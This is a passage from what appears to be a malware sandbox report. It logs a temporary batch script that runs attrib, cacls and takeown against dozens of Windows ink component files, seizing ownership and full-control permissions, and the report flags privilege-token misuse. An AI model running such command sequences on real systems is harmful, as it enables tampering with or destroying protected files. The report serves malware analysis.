  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi""
  2⤵
  PID:1860
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi"
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi" /E /G Admin:F /C
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi""
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi""
  2⤵
  PID:1432
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi" /E /G Admin:F /C
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi"
    3⤵
    - Views/modifies file attributes
    PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\FlickLearningWizard.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui""
  2⤵
  PID:1124
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui"
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkObj.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui"
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui"
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui""
  2⤵
  PID:676
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui" /E /G Admin:F /C
    3⤵
    PID:368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IPSEventLogMsg.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui""
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\IpsMigrationPlugin.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi""
  2⤵
  PID:300
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi" /E /G Admin:F /C
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui""
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\micaut.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mshwLatin.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui""
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\rtscom.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi"
    3⤵
    - Views/modifies file attributes
    PID:1488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui""
  2⤵
  PID:388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui" /E /G Admin:F /C
    3⤵
    PID:676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tabskb.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui""
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipRes.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui""
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipTsf.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui""
  2⤵
  PID:884
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\tipresx.dll.mui"
    3⤵
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi"
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tipresx.dll.mui"
    3⤵
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml""
  2⤵
  PID:1460
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml"
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml" /E /G Admin:F /C
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml"
    3⤵
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml""
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml"
    3⤵
    - Views/modifies file attributes
    PID:1748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml"
    3⤵
    - Modifies file permissions
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml""
  2⤵
  PID:1220
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml"
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml"
    3⤵
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml""
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml" /E /G Admin:F /C
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml"
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml""
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml"
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml" /E /G Admin:F /C
    3⤵
    PID:620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml"
    3⤵
    PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml""
  2⤵
  PID:1684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad.xml"
    3⤵
    PID:1320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base.xml"
    3⤵
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml""
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml"
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml" /E /G Admin:F /C
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml"
    3⤵
    PID:240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml"
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
